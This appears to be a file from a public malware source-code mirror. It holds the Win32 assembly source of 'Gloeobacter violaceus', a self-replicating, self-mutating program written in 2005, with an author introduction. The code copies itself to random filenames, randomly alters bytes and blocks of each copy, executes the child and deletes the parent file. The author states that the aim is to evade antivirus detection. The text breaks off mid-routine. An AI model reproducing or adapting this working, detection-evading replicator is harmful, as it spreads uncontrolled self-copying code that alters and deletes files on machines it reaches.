mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
673 lines
24 KiB
NASM
673 lines
24 KiB
NASM
|
Gloeobacter violaceus
|
||
|
by Second Part To Hell/[rRlf]
|
||
|
www.spth.de.vu
|
||
|
spth@priest.com
|
||
|
written in May 2005
|
||
|
in Austria
|
||
|
|
||
|
I proudly present my very first real Win32 Project.
|
||
|
Before anything else I have to say that this is neighter a real virus
|
||
|
nor a real engine. It is a program emulating the nature's mutations.
|
||
|
|
||
|
I would descripe it as a primitive artificial life form.
|
||
|
|
||
|
How does it work?
|
||
|
1) When executed, it get's the own filename and the parent's filename
|
||
|
2) It sleeps for 1500 + (0..4095) milliseconds
|
||
|
3) It copies itself to a random filename in the current directory
|
||
|
4) 1/4 it mutates:
|
||
|
- Point Mutation: ~68.75%
|
||
|
- Chromosome Mutation:
|
||
|
* Chromosome Inversation
|
||
|
* Chromosome Translocation
|
||
|
* Chromosome Delection
|
||
|
* Chromosome Dublication
|
||
|
* Chromosome Inseration
|
||
|
5) It executes the new file
|
||
|
6) With a chance of ~50% it jmps to 2
|
||
|
7) It deletes the partent's file
|
||
|
8) It exits it's own process
|
||
|
|
||
|
Where the hell can you see a primitive artificial life form?
|
||
|
|
||
|
Well, we can also say, that the project behaves like that:
|
||
|
|
||
|
1) Birth of the lifeform
|
||
|
2) Growing up until it can replicate itself
|
||
|
3/4) Replicate - there may happen mistakes while replicating
|
||
|
5) Birth of the child
|
||
|
6) Maybe it makes another child?!
|
||
|
7) Give me more space - Remove the corpse of the parent
|
||
|
8) Death of the lifeform
|
||
|
|
||
|
About the name: I've thought long time about a suitable name,
|
||
|
and I think I got a right one: 'Gloeobacter violaceus' are very simple
|
||
|
bacteria, and also one of the very first life form on our world.
|
||
|
|
||
|
With this code I've (more than) partly realized my idea, which I've
|
||
|
written down in the article "Code Evolution: Follow nature's example", and
|
||
|
I think I've succeded.
|
||
|
|
||
|
Now let me write some lines about it's behaviour when it's executed:
|
||
|
First I have to say that every mutation may kill the children. But nevermind,
|
||
|
the same also happens in nature. As I have tested it very well, I've been faced
|
||
|
with some strange mutations. Let me tell you some: The filename of the child
|
||
|
was not .exe but something else; sometimes the DOS-Box opened (when the MZ was
|
||
|
deleted or changed, Windows wanted to run it as a .COM); and the maybe stranges
|
||
|
thing ever happend while testing was the creation of two file called 'v' and ' '.
|
||
|
One is 1kB and one is 500kB, I can neighter read, overwrite, delete or do anything
|
||
|
else with them. And furthermore they have no arguments as creation-time. They are
|
||
|
just lost space at my HD, but who cares, I dont need these 501kB :)
|
||
|
|
||
|
My intention in writing this code was, beside of creating an artificial life form,
|
||
|
making a technique, which CAN NOT be fully detect by AVs. Reason: Every BIT (!)
|
||
|
can be changed, and there is no way to find out, how the whole code is changed.
|
||
|
|
||
|
As even the body of the code may be changed, this could also be called metamorphism.
|
||
|
But I would not call it 'metamorph', as everything is random (the code don't 'know'
|
||
|
what it does).
|
||
|
|
||
|
Thanks goes to BlueOwl and Dr3f, who helped me with some problems with Win32 APIs.
|
||
|
|
||
|
For compiling:
|
||
|
Delete the into (this!) and use 'flat assembler 1.56'.
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Gloeobacter violaceus ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
|
||
|
include '..\FASM\INCLUDE\win32ax.inc'
|
||
|
|
||
|
.data
|
||
|
systemtime_struct: ; for random number
|
||
|
dw 0 ; wYear
|
||
|
dw 0 ; wMonth
|
||
|
dw 0 ; wDayOfWeek
|
||
|
dw 0 ; wDay
|
||
|
dw 0 ; wHour
|
||
|
dw 0 ; wMinute
|
||
|
dw 0 ; wSecond
|
||
|
rnd: dw 0 ; wMilliseconds
|
||
|
|
||
|
rand_name_buffer: ; The random-engine fills this buffer with 8 random (0-255) bytes
|
||
|
times 8 db 0
|
||
|
|
||
|
rnd_file_name: ; This will contain the filename of the new child
|
||
|
times 8 db 0
|
||
|
db '.exe',0
|
||
|
|
||
|
current_file_value: ; Will contain the current running filename
|
||
|
times 8 db 0
|
||
|
db '.exe',0
|
||
|
|
||
|
parent_file dd 0x0 ; Buffer for pointer to the parent-file-name
|
||
|
current_file dd 0x0 ; Buffer for pointer to the current running file
|
||
|
file_handle dd 0x0
|
||
|
file_size dd 0x0
|
||
|
map_pointer dd 0x0
|
||
|
map_handle dd 0x0
|
||
|
change_byte_offset dd 0x0
|
||
|
change_byte_value db 0x0
|
||
|
|
||
|
StartUp_struct:
|
||
|
StartUp_struct_cb dd 0
|
||
|
StartUp_struct_lpReserved dd 0
|
||
|
StartUp_struct_lpDesktop dd 0
|
||
|
StartUp_struct_lpTitle dd 0
|
||
|
StartUp_struct_dwX dd 0
|
||
|
StartUp_struct_dwY dd 0
|
||
|
StartUp_struct_dwXSize dd 0
|
||
|
StartUp_struct_dwYSize dd 0
|
||
|
StartUp_struct_dwXCountChars dd 0
|
||
|
StartUp_struct_dwYCountChars dd 0
|
||
|
StartUp_struct_dwFillAttribute dd 0
|
||
|
StartUp_struct_dwFlags dd 0
|
||
|
StartUp_struct_wShowWindow dw 0
|
||
|
StartUp_struct_cbReserved2 dw 0
|
||
|
StartUp_struct_lpReserved2 dd 0
|
||
|
StartUp_struct_hStdInput dd 0
|
||
|
StartUp_struct_hStdOutput dd 0
|
||
|
StartUp_struct_hStdError dd 0
|
||
|
|
||
|
|
||
|
ProcessInfo_Struct:
|
||
|
PROCESS_INFORMATION_hProcess dd 0
|
||
|
PROCESS_INFORMATION_hThread dd 0
|
||
|
PROCESS_INFORMATION_dwProcessId dd 0
|
||
|
PROCESS_INFORMATION_dwThreadId dd 0
|
||
|
|
||
|
|
||
|
|
||
|
.code
|
||
|
start:
|
||
|
invoke GetCommandLine ; Get the name of the current file
|
||
|
|
||
|
cmp byte [eax], '"' ; Compare if first byte is ". As GetCommandLine could be ["filename"] or [filename]
|
||
|
jne got_my_name ; If no ", then we already have it
|
||
|
|
||
|
;;; FIRST EXECUTION ;;;
|
||
|
|
||
|
inc eax ; Delete first "
|
||
|
mov ebx, eax ; Save the pointer
|
||
|
get_my_name:
|
||
|
inc ebx ; Get next byte
|
||
|
cmp byte [ebx], '.' ; Compare the value with a dot
|
||
|
jne get_my_name ; If not equal, get next letter of the filename
|
||
|
|
||
|
add ebx, 4 ; Get the pointer of the second "
|
||
|
mov byte [ebx], 0x0 ; Del the second "
|
||
|
sub ebx, 4 ; Go back to the dot
|
||
|
get_my_name2:
|
||
|
dec ebx ; Previous letter
|
||
|
cmp byte [ebx], '\' ; Check if it's the end of the path (=filestart-1)
|
||
|
jne get_my_name2 ; if not, get another letter
|
||
|
|
||
|
inc ebx ; delete the '\'
|
||
|
mov eax, ebx ; eax=ebx=pointer to start of currentfilename
|
||
|
|
||
|
;;; END FIRST EXECUTION ;;;
|
||
|
|
||
|
got_my_name:
|
||
|
mov byte [eax+12], 0x0 ; make a NULL-terminated string
|
||
|
mov [current_file], eax ; Save the filename of the current running process
|
||
|
|
||
|
add eax, 13 ; Point to the first letter of the parent
|
||
|
mov [parent_file], eax ; Save the pointer to the parent
|
||
|
|
||
|
call random_number ; Get random number
|
||
|
mov ecx, [rand_name_buffer] ; Move a random number to ecx
|
||
|
and ecx, 1 ; Random number between 0 and 1: New counter
|
||
|
|
||
|
add ecx, 1 ; ecx++ (counter: 1 or 2 childs)
|
||
|
|
||
|
create_next_child:
|
||
|
push ecx ; Save the counter
|
||
|
|
||
|
call random_number ; Renew random numbers
|
||
|
mov ebp, 1500 ; ebp=1500
|
||
|
mov eax, [rand_name_buffer] ; eax=random number
|
||
|
and eax, 4095 ; eax=0000 0000 0000 0000 0000 ???? ???? ????
|
||
|
add ebp, eax ; ebp=1500+(0..4095)
|
||
|
invoke Sleep, ebp ; Sleep 1500+(0..4095) ms
|
||
|
|
||
|
call get_n_save_random_name ; Get a random filename
|
||
|
invoke CopyFile, [current_file], rnd_file_name, 0 ; Copy current file to new file with random name
|
||
|
|
||
|
call random_number ; Get new random number
|
||
|
mov ax, [rand_name_buffer] ; Get them from buffer
|
||
|
xor ah, al ; compain 2 bytes
|
||
|
and ah, 3 ; ???? ???? -> 0000 00??
|
||
|
cmp ah, 2 ; ah=0000 0010?
|
||
|
je evolution ; If yes -> evolution
|
||
|
noevolution: ; Code continues here after mutation, if there where any
|
||
|
call birthofchild ; Make the child living!
|
||
|
pop ecx ; Another child?
|
||
|
loop create_next_child ; If counter>1, create new child!
|
||
|
|
||
|
cmp [parent_file], 0x0 ; Compare if parent_file = 0 (first execution?)
|
||
|
je Death ; If so, no parent killing, as there is no parent!
|
||
|
|
||
|
invoke DeleteFile, [parent_file] ; Kill the parent! (sorry mum, sorry dad :D)
|
||
|
|
||
|
Death:
|
||
|
invoke ExitProcess, 0 ; Close current process: Death! :)
|
||
|
|
||
|
birthofchild:
|
||
|
mov esi, [current_file] ; esi=pointer to current file name
|
||
|
mov edi, current_file_value ; edi=pointer to buffer for current file name
|
||
|
mov ecx, 8 ; counter: 8 bytes to copy
|
||
|
rep movsb ; Move ecx byte from [esi] to [edi]
|
||
|
|
||
|
mov byte [current_file_value-1], 0x20 ; Delete the 0x0
|
||
|
invoke CreateProcess, 0x0, rnd_file_name, 0x0, 0x0, FALSE, 0x0, 0x0, 0x0, StartUp_struct, ProcessInfo_Struct ; Create child-process
|
||
|
mov byte [current_file_value-1], 0x0 ; Reset the 0x0
|
||
|
ret
|
||
|
|
||
|
random_number:
|
||
|
pop edi ; Get value of stack
|
||
|
push edi ; Back to the stack
|
||
|
mov ecx, 8 ; ecx=counter
|
||
|
mov dh, 0xAA ; dh: changes in the function and makes the number little bit more random
|
||
|
mov dl, 0x87 ; same as dh
|
||
|
random_name_loop:
|
||
|
push dx ; Save dx at stack
|
||
|
push ecx ; Save counter at stack
|
||
|
call random_byte ; Random number in al
|
||
|
pop ecx ; get counter
|
||
|
xor al, cl ; Counter influences pseudo random number
|
||
|
pop dx ; Get dx
|
||
|
push ecx
|
||
|
xor dx, cx ; Counter influences influncing number
|
||
|
add dh, al ; Random number influences influencing number
|
||
|
sub dl, al ; Same as dh
|
||
|
neg dl ; Neg dl
|
||
|
xor dl, dh ; dl XOR dh -> more variability
|
||
|
xor al, dl ; random number changes
|
||
|
sub ax, di ; value of stack influences random number
|
||
|
add ax, dx ; ax+dx
|
||
|
mov dl, [rand_name_buffer+ecx-2]
|
||
|
mov dh, [rand_name_buffer+ecx-3] ; dx=???? ???? ????? ?????
|
||
|
sub al, dl ; al-=dl
|
||
|
add al, dh ; al+=dh
|
||
|
mov ah, dl ; ah=dl
|
||
|
push ax ; AX to stack
|
||
|
mov cl, 1 ; cl=1
|
||
|
or dh, cl ; dh is at least 1 (to reduce chance of result=zero)
|
||
|
mul dh ; AL=AX*DH
|
||
|
pop cx ; CX=old AX
|
||
|
push cx ; To stack again
|
||
|
add cl, al ; CL+=AL
|
||
|
sub cl, ah ; CL-=AH
|
||
|
xchg al, cl ; AL=CL
|
||
|
mov cx, bp ; cx=bp
|
||
|
mul cl ; AX=AL*CL
|
||
|
neg ah ; NEG AH
|
||
|
xor al, ah ; xor AL and AH
|
||
|
pop cx ; get old AX
|
||
|
sub cl, al ; SUB
|
||
|
add cl, dl ; cl+=old random number
|
||
|
sub al, cl ; al ~=random :)
|
||
|
pop ecx ; Get counter
|
||
|
mov [rand_name_buffer+ecx-1], al ; Save random letter
|
||
|
loop random_name_loop
|
||
|
|
||
|
ret
|
||
|
|
||
|
random_name:
|
||
|
call random_number ; Get 8 random bytes
|
||
|
mov ecx, 8 ; counter=8, as we want to do it 8 times
|
||
|
|
||
|
changetoletter:
|
||
|
mov al, [rand_name_buffer+ecx-1] ; Get a letter
|
||
|
mov bl, 10 ; BL=10
|
||
|
xor ah, ah ; AX: 0000 0000 ???? ????
|
||
|
div bl ; AL=rnd/10=number between 0 and 25
|
||
|
add al, 97 ; Add 97 for getting lowercase letters
|
||
|
mov [rnd_file_name+ecx-1], al ; Save random letter
|
||
|
loop changetoletter
|
||
|
ret
|
||
|
|
||
|
random_byte:
|
||
|
invoke GetSystemTime, systemtime_struct ; Get first number
|
||
|
mov ebx, [rnd-2] ; ebx=number
|
||
|
add ebx, edx ; Making it pseudo-independent of time
|
||
|
sub ebx, ecx
|
||
|
xor ebx, eax
|
||
|
xchg bl, bh
|
||
|
pop ecx
|
||
|
push ecx
|
||
|
neg ebx
|
||
|
xor ebx, ecx ; ebx=pseudo-indepentend number
|
||
|
|
||
|
invoke GetTickCount ; Get second number
|
||
|
xor eax, ecx ; eax=number
|
||
|
neg ax ; Making it pseudo-independent of time
|
||
|
xor eax, edx
|
||
|
xor ah, al
|
||
|
sub eax, ebp
|
||
|
add eax, esi ; eax=pseudo-indepentend number
|
||
|
|
||
|
xor eax, ebx ; Compain the numbers -> eax
|
||
|
mov ebx, eax ; Save eax
|
||
|
shr eax, 8 ; e-part -> ax
|
||
|
xor ax, bx
|
||
|
xor al, ah ; al=number
|
||
|
ret
|
||
|
|
||
|
get_n_save_random_name:
|
||
|
mov ebp, 12 ; ebp influences the pseudo-random-number engine too
|
||
|
call random_name ; Get a random name
|
||
|
ret
|
||
|
|
||
|
evolution:
|
||
|
; invoke MessageBox, 0x0, rnd_file_name, "Code Evolution", 0x0
|
||
|
|
||
|
invoke CreateFile, rnd_file_name, 0xC0000000 ,0x1, 0x0, 0x3, 0x0, 0x0 ; Open the new created file
|
||
|
mov [file_handle], eax ; Save the file handle
|
||
|
invoke GetFileSize, [file_handle], file_size ; Get the size of the file
|
||
|
mov [file_size], eax ; Low Filesize returned in eax
|
||
|
invoke CreateFileMapping, [file_handle], 0x0, PAGE_READWRITE, 0x0, [file_size], 0x0 ; Create a Map
|
||
|
mov [map_handle], eax ; Save the Map handle
|
||
|
|
||
|
invoke MapViewOfFile, [map_handle], FILE_MAP_WRITE, 0x0, 0x0, [file_size] ; Map view of file
|
||
|
mov [map_pointer], eax ; Save the pointer of file
|
||
|
|
||
|
call random_number ; Get a random number
|
||
|
mov al, [rand_name_buffer] ; Radom number in al
|
||
|
|
||
|
; Chances:
|
||
|
; Point-Mutation: ~50%+18.75%=~68.75%
|
||
|
; Each Chromosome Mutation: ~6.25%
|
||
|
|
||
|
and al, 1 ; al=0000 000?
|
||
|
cmp al, 1 ; Compare with 1
|
||
|
je pointmutation ; If al=1 then jmp pointmutation (change: ~50%)
|
||
|
|
||
|
mov al, [rand_name_buffer+4] ; al=new random number
|
||
|
and al, 7 ; al=0000 0???
|
||
|
|
||
|
cmp al, 0 ; Compare al with 0
|
||
|
je chrom_inversation ; If al=0 make Chromosome Inversation
|
||
|
|
||
|
cmp al, 1 ; Compare al with 1
|
||
|
je chrom_translocation ; If al=1 make Chromosome Translocation
|
||
|
|
||
|
cmp al, 2 ; Compare al with 2
|
||
|
je chrom_delection ; If al=2 make Chromosome Delection
|
||
|
|
||
|
cmp al, 3 ; Compare al with 3
|
||
|
je chrom_dublication ; If al=2 make Chromosome Dublication
|
||
|
|
||
|
cmp al, 4 ; Compare al with 4
|
||
|
je chrom_inseration ; If al=4 make Chromosome Inseration
|
||
|
|
||
|
jmp pointmutation ; Otherwise do Pointmutation (Chance ~18.75%)
|
||
|
|
||
|
endofmutation:
|
||
|
invoke UnmapViewOfFile, [map_pointer] ; Unmap View of File
|
||
|
|
||
|
invoke CloseHandle, [map_handle] ; Close Map
|
||
|
invoke CloseHandle, [file_handle] ; Close File
|
||
|
jmp noevolution
|
||
|
|
||
|
pointmutation: ; Mutation: Pointmutation
|
||
|
call random_number ; Renew the random numbers
|
||
|
xor eax, eax ; eax=0
|
||
|
mov ax, [rand_name_buffer] ; eax=0000 0000 0000 0000 ???? ???? ???? ????
|
||
|
mov ebx, [file_size] ; ebx=File size
|
||
|
cmp eax, ebx ; comparee Random Number with File Size
|
||
|
jg pointmutation ; If RN>Filesize then get new random number (=byte to change)
|
||
|
|
||
|
add eax, [map_pointer] ; eax=Byte to change in memory
|
||
|
mov [change_byte_offset], eax ; Save the offset
|
||
|
|
||
|
mov ah, [eax] ; Get the value of the byte
|
||
|
mov [change_byte_value], ah ; Save it
|
||
|
|
||
|
mov cl, [rand_name_buffer+5] ; cl=???? ????
|
||
|
and cl, 7 ; cl=0000 0???
|
||
|
mov al, 1 ; al=0000 0001
|
||
|
shl al, cl ; AL= ? <- |0|0|0|0| |0|0|0|1| -- ?
|
||
|
mov esi, [change_byte_offset] ; esi=offset of byte to change
|
||
|
xor [esi], al ; XOR byte with AL
|
||
|
; invoke MessageBox, 0x0, esi, "Point Mutation", 0x0
|
||
|
jmp endofmutation
|
||
|
|
||
|
chrom_inversation: ; Mutation: Chromosome Mutation - Inversation
|
||
|
call random_number ; Renew the random numbers
|
||
|
xor eax, eax ; eax=0
|
||
|
mov ax, [rand_name_buffer] ; eax=0000 0000 0000 0000 ???? ???? ???? ????
|
||
|
mov ebx, [file_size] ; ebx=Filesize
|
||
|
sub ebx, 16 ; ebx-=16 (As we may change two 8 byte parts)
|
||
|
cmp eax, ebx ; comparee Random number with Filesize-16
|
||
|
jg chrom_inversation ; If RN>Filesize-16 then get new random number (=place to change)
|
||
|
|
||
|
add eax, [map_pointer] ; Add the offset of file memory
|
||
|
mov [change_byte_offset], eax ; Save the -to-be-changed- offset
|
||
|
|
||
|
xor ecx, ecx ; ecx=0
|
||
|
mov cx, [rand_name_buffer+2] ; ecx=0000 0000 0000 0000 ???? ???? ???? ????
|
||
|
and cx, 7 ; ecx=0000 0000 0000 0000 0000 0000 0000 0???
|
||
|
mov [change_byte_value], cl ; Save cl (=How many bytes to change)
|
||
|
|
||
|
mov esi, [change_byte_offset] ; ESI=Offset of part 1
|
||
|
mov edi, rand_name_buffer ; EDI=Offset of Buffer
|
||
|
rep movsb ; part 1 to buffer: REP MOVS m8,m8 Move (E)CX bytes from DS:[(E)SI] to ES:[(E)DI]
|
||
|
|
||
|
|
||
|
xor eax, eax ; eax=0
|
||
|
mov al, [change_byte_value] ; eax=Counter (start of part 2)
|
||
|
add eax, [change_byte_offset] ; eax+=Offset in memory of part 2
|
||
|
|
||
|
xor ecx, ecx ; ecx=0
|
||
|
mov cl, [change_byte_value] ; ecx=Counter
|
||
|
|
||
|
mov esi, eax ; ESI=Offset of part 2
|
||
|
mov edi, [change_byte_offset] ; EDI=Offset of part 1
|
||
|
rep movsb ; part 2 to part 1: REP MOVS m8,m8 Move (E)CX bytes from DS:[(E)SI] to ES:[(E)DI]
|
||
|
|
||
|
|
||
|
xor ecx, ecx ; ecx=0
|
||
|
mov cl, [change_byte_value] ; ecx=Counter
|
||
|
mov eax, [change_byte_offset] ; eax=Start of part 1
|
||
|
add eax, ecx ; eax=Start of part 2
|
||
|
|
||
|
mov esi, rand_name_buffer ; ESI=Offset of buffer
|
||
|
mov edi, eax ; EDI=Offset of part 2
|
||
|
rep movsb ; buffer to part 1
|
||
|
|
||
|
; invoke MessageBox, 0x0, "Inversation", "Chromosome Mutation", 0x0
|
||
|
jmp endofmutation ; Finished Inversation!
|
||
|
|
||
|
chrom_translocation:
|
||
|
call random_number ; Renew the random numbers
|
||
|
xor eax, eax ; eax=0
|
||
|
mov ax, [rand_name_buffer] ; eax=0000 0000 0000 0000 ???? ???? ???? ????
|
||
|
mov ebx, [file_size] ; ebx=Filesize
|
||
|
sub ebx, 8 ; ebx-=8 (As we may change 8 byte)
|
||
|
cmp eax, ebx ; Compare Random number with Filesize-8
|
||
|
jg chrom_translocation ; If RN>Filesize-8 then get new random number (=place to change)
|
||
|
|
||
|
add eax, [map_pointer] ; Add the offset of file memory
|
||
|
mov [change_byte_offset], eax ; Save the -to-be-changed- offset
|
||
|
|
||
|
xor ecx, ecx ; ecx=0
|
||
|
mov cx, [rand_name_buffer+2] ; ecx=0000 0000 0000 0000 ???? ???? ???? ????
|
||
|
and cx, 7 ; ecx=0000 0000 0000 0000 0000 0000 0000 0???
|
||
|
mov [change_byte_value], cl ; Save cl (=How many bytes to change)
|
||
|
|
||
|
mov esi, [change_byte_offset] ; ESI=Offset of source
|
||
|
mov edi, rand_name_buffer ; EDI=Offset of Buffer
|
||
|
rep movsb ; Code-Part to buffer: MOVS m8,m8 Move (E)CX bytes from DS:[(E)SI] to ES:[(E)DI]
|
||
|
|
||
|
mov ecx, [file_size] ; eax=filesize
|
||
|
add ecx, [map_pointer] ; eax=End of file in memory
|
||
|
sub ecx, [change_byte_offset] ; eax=Bytes after Change_byte_offset
|
||
|
|
||
|
mov esi, [change_byte_offset] ; esi=Pointer to change byte
|
||
|
xor eax, eax ; eax=0
|
||
|
mov al, [change_byte_value] ; eax=number of bytes to change
|
||
|
add esi, eax ; esi=Pointer to end of changing in memory
|
||
|
|
||
|
mov edi, [change_byte_offset] ; edi=Offset of changing
|
||
|
rep movsb
|
||
|
|
||
|
chrom_trans_loop: ; Get a offset, where to save the part
|
||
|
call random_number ; Renew the random numbers
|
||
|
xor eax, eax ; eax=0
|
||
|
mov ax, [rand_name_buffer] ; eax=0000 0000 0000 0000 ???? ???? ???? ????
|
||
|
mov ebx, [file_size] ; ebx=Filesize
|
||
|
sub ebx, 8 ; ebx-=8 (As we may change 8 byte)
|
||
|
cmp eax, ebx ; Compare Random number with Filesize-8
|
||
|
jg chrom_trans_loop ; If RN>Filesize-8 then get new random number (=place to change)
|
||
|
|
||
|
add eax, [map_pointer] ; Add the offset of file memory
|
||
|
mov [change_byte_offset], eax ; Save offset of changing
|
||
|
|
||
|
mov ecx, [map_pointer] ; ecx=Start of file in memory
|
||
|
add ecx, [file_size] ; ecx=End of file in memory
|
||
|
|
||
|
sub ecx, [change_byte_offset] ; ecx=Bytes after change-place
|
||
|
xor eax, eax ; eax=0
|
||
|
mov al, [change_byte_value] ; eax=number of bytes to change
|
||
|
sub ecx, eax ; ecx-=number of bytes to change
|
||
|
|
||
|
mov esi, [change_byte_offset] ; esi=Offset of changing
|
||
|
mov edi, [change_byte_offset] ; edi=offset of changing
|
||
|
add edi, eax ; edi=Offset after changing
|
||
|
|
||
|
chrom_trans_buffer: ; Delete the Code-Part
|
||
|
mov al, [esi+ecx] ; al=Value to Replace
|
||
|
mov [edi+ecx], al ; Save al
|
||
|
loop chrom_trans_buffer
|
||
|
|
||
|
; invoke MessageBox, 0x0, "Translocation", "Chromosome Mutation", 0x0
|
||
|
jmp endofmutation
|
||
|
|
||
|
chrom_delection:
|
||
|
call random_number ; Renew the random numbers
|
||
|
xor eax, eax ; eax=0
|
||
|
mov ax, [rand_name_buffer] ; eax=0000 0000 0000 0000 ???? ???? ???? ????
|
||
|
mov ebx, [file_size] ; ebx=Filesize
|
||
|
sub ebx, 8 ; ebx-=8
|
||
|
cmp eax, ebx ; comparee Random number with Filesize
|
||
|
jg chrom_delection ; If RN>Filesize-8 then get new random number (=place to change)
|
||
|
|
||
|
add eax, [map_pointer] ; Add the offset of file memory
|
||
|
mov [change_byte_offset], eax ; Save the pointer
|
||
|
|
||
|
call random_number ; Get a random number
|
||
|
xor ecx, ecx ; ecx=0
|
||
|
mov cl, [rand_name_buffer] ; cl=random number
|
||
|
and cl, 7 ; cl=0000 0???
|
||
|
mov [change_byte_value], cl ; Save the random number
|
||
|
|
||
|
mov ecx, [file_size] ; eax=filesize
|
||
|
add ecx, [map_pointer] ; eax=End of file in memory
|
||
|
sub ecx, [change_byte_offset] ; eax=Bytes after Change_byte_offset
|
||
|
|
||
|
mov esi, [change_byte_offset] ; esi=Pointer to change byte
|
||
|
xor eax, eax ; eax=0
|
||
|
mov al, [change_byte_value] ; eax=number of bytes to change
|
||
|
add esi, eax ; esi=Pointer to end of changing in memory
|
||
|
|
||
|
mov edi, [change_byte_offset] ; edi=Offset of changing
|
||
|
rep movsb
|
||
|
|
||
|
; invoke MessageBox, 0x0, "Delection", "Chromosome Mutation", 0x0
|
||
|
jmp endofmutation
|
||
|
|
||
|
chrom_dublication:
|
||
|
invoke UnmapViewOfFile, [map_pointer] ; Unmap File, as we need to open it with another size
|
||
|
invoke CloseHandle, [map_handle] ; Close Map-Handle
|
||
|
|
||
|
call random_number ; Get a random number
|
||
|
xor ecx, ecx ; ecx=0
|
||
|
mov cl, [rand_name_buffer] ; cl=random number
|
||
|
and cl, 7 ; cl=0000 0???
|
||
|
mov [change_byte_value], cl ; Save the random number
|
||
|
|
||
|
add ecx, [file_size] ; ecx=New filesize
|
||
|
mov [file_size], ecx ; Save new filesize
|
||
|
invoke CreateFileMapping, [file_handle], 0x0, PAGE_READWRITE, 0x0, [file_size], 0x0
|
||
|
mov [map_handle], eax
|
||
|
|
||
|
invoke MapViewOfFile, [map_handle], FILE_MAP_WRITE, 0x0, 0x0, [file_size]
|
||
|
mov [map_pointer], eax
|
||
|
|
||
|
chrom_dubl_loop1:
|
||
|
call random_number ; Renew the random numbers
|
||
|
xor eax, eax ; eax=0
|
||
|
mov ax, [rand_name_buffer] ; eax=0000 0000 0000 0000 ???? ???? ???? ????
|
||
|
mov ebx, [file_size] ; ebx=Filesize
|
||
|
sub ebx, 8 ; ebx-=8
|
||
|
cmp eax, ebx ; comparee Random number with Filesize
|
||
|
jg chrom_dubl_loop1 ; If RN>Filesize-8 then get new random number (=place to change)
|
||
|
|
||
|
add eax, [map_pointer] ; eax=Pointer to changing part
|
||
|
mov [change_byte_offset], eax ; Save the offset
|
||
|
|
||
|
mov ecx, [map_pointer] ; ecx=Start of file in memory
|
||
|
add ecx, [file_size] ; ecx=End of file in memory
|
||
|
|
||
|
sub ecx, [change_byte_offset] ; ecx=Bytes after change-place
|
||
|
xor eax, eax ; eax=0
|
||
|
mov al, [change_byte_value] ; eax=number of bytes to change
|
||
|
sub ecx, eax ; ecx-=number of bytes to change
|
||
|
|
||
|
mov esi, [change_byte_offset] ; esi=Offset of changing
|
||
|
mov edi, [change_byte_offset] ; edi=offset of changing
|
||
|
add edi, eax ; edi=Offset after changing
|
||
|
|
||
|
chrom_dubl_buffer: ; Make a buffer
|
||
|
mov al, [esi+ecx] ; al=Value to Replace
|
||
|
mov [edi+ecx], al ; Save al
|
||
|
loop chrom_dubl_buffer
|
||
|
|
||
|
xor ecx, ecx ; ecx=0
|
||
|
mov cl, [change_byte_value] ; ecx=lenght of string to dublicate
|
||
|
mov esi, [change_byte_offset] ; From
|
||
|
mov edi, [change_byte_offset] ; To
|
||
|
add edi, ecx ; Offset of buffer
|
||
|
rep movsb
|
||
|
|
||
|
; invoke MessageBox, 0x0, "Dublication", "Chromosome Mutation", 0x0
|
||
|
jmp endofmutation
|
||
|
|
||
|
|
||
|
chrom_inseration:
|
||
|
invoke UnmapViewOfFile, [map_pointer] ; Unmap File, as we need to open it with anothe size
|
||
|
invoke CloseHandle, [map_handle] ; Close Map-Handle
|
||
|
|
||
|
call random_number ; Get a random number
|
||
|
xor ecx, ecx ; ecx=0
|
||
|
mov cl, [rand_name_buffer] ; cl=random number
|
||
|
and cl, 7 ; cl=0000 0???
|
||
|
mov [change_byte_value], cl ; Save the random number
|
||
|
|
||
|
add ecx, [file_size] ; ecx=New filesize
|
||
|
mov [file_size], ecx ; Save new filesize
|
||
|
invoke CreateFileMapping, [file_handle], 0x0, PAGE_READWRITE, 0x0, [file_size], 0x0
|
||
|
mov [map_handle], eax
|
||
|
|
||
|
invoke MapViewOfFile, [map_handle], FILE_MAP_WRITE, 0x0, 0x0, [file_size]
|
||
|
mov [map_pointer], eax
|
||
|
|
||
|
chrom_inser_loop1:
|
||
|
call random_number ; Renew the random numbers
|
||
|
xor eax, eax ; eax=0
|
||
|
mov ax, [rand_name_buffer] ; eax=0000 0000 0000 0000 ???? ???? ???? ????
|
||
|
mov ebx, [file_size] ; ebx=Filesize
|
||
|
sub ebx, 8 ; ebx-=8
|
||
|
cmp eax, ebx ; comparee Random number with Filesize
|
||
|
jg chrom_inser_loop1 ; If RN>Filesize-8 then get new random number (=place to change)
|
||
|
|
||
|
add eax, [map_pointer] ; eax=Pointer to changing part
|
||
|
mov [change_byte_offset], eax ; Save the offset
|
||
|
|
||
|
mov esi, [change_byte_offset] ; esi=Offset to get the new part
|
||
|
mov edi, rand_name_buffer ; edi=where to save
|
||
|
xor ecx, ecx ; ecx=0
|
||
|
mov cl, [change_byte_value] ; ecx=How many bytes
|
||
|
rep movsb ; Save the part.
|
||
|
|
||
|
chrom_inser_loop2:
|
||
|
call random_number ; Renew the random numbers
|
||
|
xor eax, eax ; eax=0
|
||
|
mov ax, [rand_name_buffer] ; eax=0000 0000 0000 0000 ???? ???? ???? ????
|
||
|
mov ebx, [file_size] ; ebx=Filesize
|
||
|
sub ebx, 8 ; ebx-=8
|
||
|
cmp eax, ebx ; Compare Random number with Filesize
|
||
|
jg chrom_inser_loop2 ; If RN>Filesize-8 then get new random number (=place to change)
|
||
|
|
||
|
add eax, [map_pointer] ; eax=Pointer to changing part
|
||
|
mov [change_byte_offset], eax ; Save the offset
|
||
|
|
||
|
mov ecx, [map_pointer] ; ecx=Start of file in memory
|
||
|
add ecx, [file_size] ; ecx=End of file in memory
|
||
|
|
||
|
sub ecx, [change_byte_offset] ; ecx=Bytes after change-place
|
||
|
xor eax, eax ; eax=0
|
||
|
mov al, [change_byte_value] ; eax=number of bytes to change
|
||
|
sub ecx, eax ; ecx-=number of bytes to change
|
||
|
|
||
|
mov esi, [change_byte_offset] ; esi=Offset of changing
|
||
|
mov edi, [change_byte_offset] ; edi=offset of changing
|
||
|
add edi, eax ; edi=Offset after changing
|
||
|
|
||
|
chrom_inser_buffer: ; Make a buffer
|
||
|
mov al, [esi+ecx] ; al=Value to Replace
|
||
|
mov [edi+ecx], al ; Save al
|
||
|
loop chrom_inser_buffer
|
||
|
|
||
|
mov esi, rand_name_buffer ; esi=source
